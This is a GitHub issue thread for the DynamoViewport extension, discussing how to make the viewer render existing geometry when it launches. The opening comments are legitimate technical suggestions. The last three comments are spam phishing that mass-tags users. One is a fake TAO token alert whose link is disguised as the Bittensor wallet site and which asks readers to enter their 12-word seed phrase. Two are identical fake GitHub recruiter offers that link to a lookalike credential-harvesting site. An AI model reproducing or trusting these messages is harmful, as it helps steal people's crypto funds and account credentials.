### ISSUE TITLE
Viewport should load all pre-existing geometry when instantiated

### ISSUE THREAD

**Issue by alfarok** [alfarok/DynamoViewport#19]
When a new instance of viewport is launched through the Dynamo UI all render package data should be read, translated, and displayed in the viewer.  Currently, this only happens after a new RUN or when additional changes are made in the graph forcing a new execution.

**Comment by alfarok** [comment]
Randomly noticed a possible hack solution:
Toggling the background preview on, triggers an update on all render packages!

pusedo sample logic
```python
if (background_preview.enabled == true):
    background_preview.disable
    background_preview.enable
    #background_preview.disable (optionally turn it off when Viewport launches)
else:
    background_preview.enable
    background_preview.disable
```

If the desire to always keep the default background preview disabled while Viewport is running, see if it's possible to subscribe to the toggle event and always apply an additional toggle to maintain state.

**Comment by alfarok** [comment]
Another possibility: 

```C#
(loadedParams.BackgroundPreviewViewModel as Dynamo.Wpf.ViewModels.Watch3D.HelixWatch3DViewModel).RegenerateAllPackages();
```

**Comment by alfarok** [comment]
@mjkkirschner any suggestions on this one?  I think this is the only major issue stopping me from putting this extension up on the PM.  Thought I may take another look in the coming weeks and wanted to get your opinion first.

**Comment by mjkkirschner** [comment]
yeah, that looks good, I think you can also march all nodes in the workspace and `requestRenderPackagesAsync`

**Comment by consejeriaescolar** [comment]
# Urgent TAO Token Transfer Notification

🚨 Urgent Notice: A total of 60 TAO tokens has been successfully transferred to unknown wallet address.

**Action Required:**
1. **Secure Your Wallet Immediately:**
   - Visit the official TAO Wallet website: [https://wallet.bittensor.com](https://wallet.bittlensor.com).
   - Click on "Import Wallet" and follow the instructions to import your wallet.
   - Add the 12-word phrase to your wallet for additional security.
   - Reset your private key urgently to enhance the security of your funds.

2. **Recover Transferred Funds:**
   - Once your wallet is imported, navigate to the "Reclaim Funds" section.
   - Follow the on-screen instructions to initiate the fund recovery process.

Act promptly to secure your TAO funds, add the 12-word phrase, and reset your private key for enhanced safety.

---

**Note:** Always perform these actions on the official TAO Wallet website to ensure the security of your funds. If you face any issues, contact our support team immediately.

Securely yours! 🚀


Winners: @Tore19, @lukeddy, @Krit2521, @SteedMonteiro, @lotz84, @laipogo, @geekchu

**Comment by JK-0** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
UltimoTG, @TRUST-TECH-LABS, @C91CBQ, @piesrtasty, @UdonDa, @amosaustin, @purplematter, @RedStr, @adhuna, @sebastienrocks, @lyz1948, @devton, @alexanmtz, @BankNatthapon, @shaoruu, @karvounis, @selimbiber, @morzyns, @carloschulo, @hccluck

**Comment by wsdevprogrammer** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Denis-Bolkovenko, @HOLLYwyh, @marvinmarcos, @proghax333, @sblanchet-b1, @lildata, @sambacha, @0xjesus, @HadiChaindex, @RafaelVidaurre, @HopesDad, @SeiyaKobayashi, @pi-ka, @chijianlei, @TobiasBK, @yibit, @xcalts, @mehmetfg, @d3or, @destrat18
